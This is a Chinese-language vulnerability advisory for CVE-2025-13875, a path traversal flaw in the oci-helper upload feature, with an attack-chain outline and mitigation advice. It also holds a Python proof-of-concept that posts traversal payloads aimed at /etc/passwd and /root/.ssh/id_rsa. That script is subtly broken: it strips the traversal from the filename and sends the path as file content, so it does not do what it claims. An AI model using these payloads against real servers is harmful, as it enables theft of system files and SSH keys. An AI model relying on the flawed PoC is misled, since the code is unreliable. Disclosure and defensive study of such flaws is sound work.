IPBUF安全漏洞报告
English
CVE-2025-13875 CVSS 6.3 中危

CVE-2025-13875 oci-helper路径遍历漏洞

披露日期: 2025-12-02

漏洞信息

漏洞编号
CVE-2025-13875
漏洞类型
路径遍历
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Yohann0617 oci-helper

相关标签

路径遍历CVE-2025-13875oci-helper文件上传漏洞中等严重性Yohann0617Java漏洞网络攻击低权限利用

漏洞概述

CVE-2025-13875是Yohann0617 oci-helper应用中的一个中等严重性路径遍历漏洞。该漏洞存在于OCI配置上传功能中,影响版本至3.2.4。攻击者可以通过操纵文件上传功能中的File参数,利用路径遍历技术(如使用../等相对路径符)访问服务器上的敏感文件或写入任意文件。此漏洞无需用户交互即可被低权限用户远程利用,CVSS评分6.3,属于中危级别。漏洞已被公开披露并可能已被利用,厂商在收到安全通知后未做出任何回应。

技术细节

该路径遍历漏洞位于src/main/java/com/yohann/ocihelper/service/impl/OciServiceImpl.java文件的addCfg函数中,属于OCI Configuration Upload组件。在处理文件上传时,应用程序未对用户提供的File参数进行充分的路径验证和清理。攻击者可以通过构造包含路径遍历序列(如../或..\)的文件路径,使应用程序在保存或处理文件时访问或写入预期目录之外的位置。这种漏洞可能导致敏感配置文件泄露、服务器配置被篡改,甚至在某些情况下实现远程代码执行。攻击者利用低权限账户即可远程发起攻击,无需任何用户交互。

攻击链分析

STEP 1
步骤1
攻击者识别目标系统使用Yohann0617 oci-helper应用
STEP 2
步骤2
攻击者访问OCI配置上传功能接口
STEP 3
步骤3
构造包含路径遍历序列(如../../../)的恶意文件名或文件路径
STEP 4
步骤4
通过addCfg函数上传文件,触发路径遍历漏洞
STEP 5
步骤5
应用程序在保存文件时未正确验证路径,导致访问或写入目标目录之外的敏感文件
STEP 6
步骤6
攻击者获取敏感信息(如SSH密钥、配置文件等)或实现恶意文件写入

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import os # CVE-2025-13875 Path Traversal PoC for oci-helper # Target: Yohann0617 oci-helper <= 3.2.4 target_url = "http://target.com/api/oci/config/upload" # Path traversal payload to read sensitive files path_traversal_payloads = [ "../../../etc/passwd", "../../../root/.ssh/id_rsa", "../../../app/config/database.yml" ] for payload in path_traversal_payloads: files = { 'file': (os.path.basename(payload), payload, 'text/plain') } try: response = requests.post(target_url, files=files, timeout=10) if response.status_code == 200: print(f"[+] Payload sent: {payload}") print(f"[+] Response: {response.text[:500]}") else: print(f"[-] Failed with payload: {payload}") except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") print("\n[!] Note: Adjust endpoint and authentication based on target configuration")

影响范围

Yohann0617 oci-helper <= 3.2.4

防御指南

临时缓解措施
在未安装官方修复补丁前,建议通过Web应用防火墙(WAF)配置规则阻止包含路径遍历序列(../、..\)的请求;对文件上传接口实施严格的访问控制;监控和日志记录所有文件上传操作以便及时发现异常行为;考虑暂时禁用OCI配置上传功能直到漏洞修复。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表